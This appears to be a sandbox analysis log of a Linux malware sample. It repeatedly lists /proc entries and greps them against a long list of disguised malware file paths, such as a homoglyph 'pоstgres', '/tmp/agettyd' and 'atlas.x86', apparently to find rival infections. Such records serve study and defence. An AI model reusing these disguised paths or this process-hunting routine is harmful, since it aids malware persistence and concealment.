/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1022
-
-
/bin/grepgrep exe2⤵PID:1026
-
-
/bin/lsls -latrh /proc/7082⤵PID:1025
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1029
-
-
/bin/grepgrep exe2⤵PID:1032
-
-
/bin/lsls -latrh /proc/712⤵PID:1031
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1036
-
-
/bin/grepgrep exe2⤵PID:1039
-
-
/bin/lsls -latrh /proc/7142⤵PID:1038
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1042
-
-
/bin/grepgrep exe2⤵PID:1046
-
-
/bin/lsls -latrh /proc/722⤵PID:1045
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1048
-
-
/bin/grepgrep exe2⤵PID:1052
-
-
/bin/lsls -latrh /proc/7202⤵PID:1051
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1056
-
-
/bin/grepgrep exe2⤵PID:1060
-
-
/bin/lsls -latrh /proc/732⤵PID:1059
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1063
-
-
/bin/grepgrep exe2⤵PID:1067
-
-
/bin/lsls -latrh /proc/742⤵PID:1066
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1070
-
-
/bin/grepgrep exe2⤵PID:1075
-
-
/bin/lsls -latrh /proc/752⤵PID:1074
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1078
-
-
/bin/grepgrep exe2⤵PID:1082
-
-
/bin/lsls -latrh /proc/762⤵PID:1081
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1085
-
-
/bin/lsls -latrh /proc/772⤵PID:1087
-
-
/bin/grepgrep exe2⤵PID:1088
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1091
-
-
/bin/grepgrep exe2⤵PID:1096
-
-
/bin/lsls -latrh /proc/782⤵PID:1095
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1098
-
-
/bin/grepgrep exe2⤵PID:1102
-
-
/bin/lsls -latrh /proc/82⤵PID:1101
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1104
-
-
/bin/grepgrep exe2⤵PID:1107
-
-
/bin/lsls -latrh /proc/812⤵PID:1106
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1110
-
-
/bin/grepgrep exe2⤵PID:1113
-
-
/bin/lsls -latrh /proc/822⤵PID:1112
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1115
-
-
/bin/grepgrep exe2⤵PID:1118
-
-
/bin/lsls -latrh /proc/842⤵PID:1117
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1120
-
-
/bin/grepgrep exe2⤵PID:1123
-
-
/bin/lsls -latrh /proc/92⤵PID:1122
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1125
-
-
/bin/grepgrep exe2⤵PID:1128
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1127
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1130
-
-
/bin/grepgrep exe2⤵PID:1133
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1132
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1135
-
-
/bin/grepgrep exe2⤵PID:1138
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1137
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1140
-
-
/bin/grepgrep exe2⤵PID:1143
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1142
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1145
-
-
/bin/grepgrep exe2⤵PID:1148
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1147
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1150
-
-
/bin/grepgrep exe2⤵PID:1153
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1152
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1155
-
-
/bin/grepgrep exe2⤵PID:1158
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1157
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1160
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1162
-
-
/bin/grepgrep exe2⤵PID:1163
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1168
-
-
/bin/grepgrep exe2⤵PID:1171
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1170
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1173
-
-
/bin/grepgrep exe2⤵PID:1176
-
-
/bin/lsls -latrh /proc/diskstats2⤵
- Reads runtime system information
PID:1175
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1178
-
-
/bin/grepgrep exe2⤵PID:1181
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1180
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1183
-
-
/bin/grepgrep exe2⤵PID:1186
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1185
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1188
-
-
/bin/grepgrep exe2⤵PID:1191
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1190
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1193
-
-
/bin/grepgrep exe2⤵PID:1196
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1195
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1198
-
-
/bin/grepgrep exe2⤵PID:1201
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1200
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1203
-
-
/bin/grepgrep exe2⤵PID:1206
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1205
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1208
-
-
/bin/grepgrep exe2⤵PID:1211
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1210
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1213
-
-
/bin/grepgrep exe2⤵PID:1216
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1215
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1218
-
-
/bin/grepgrep exe2⤵PID:1221
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1220
-
-
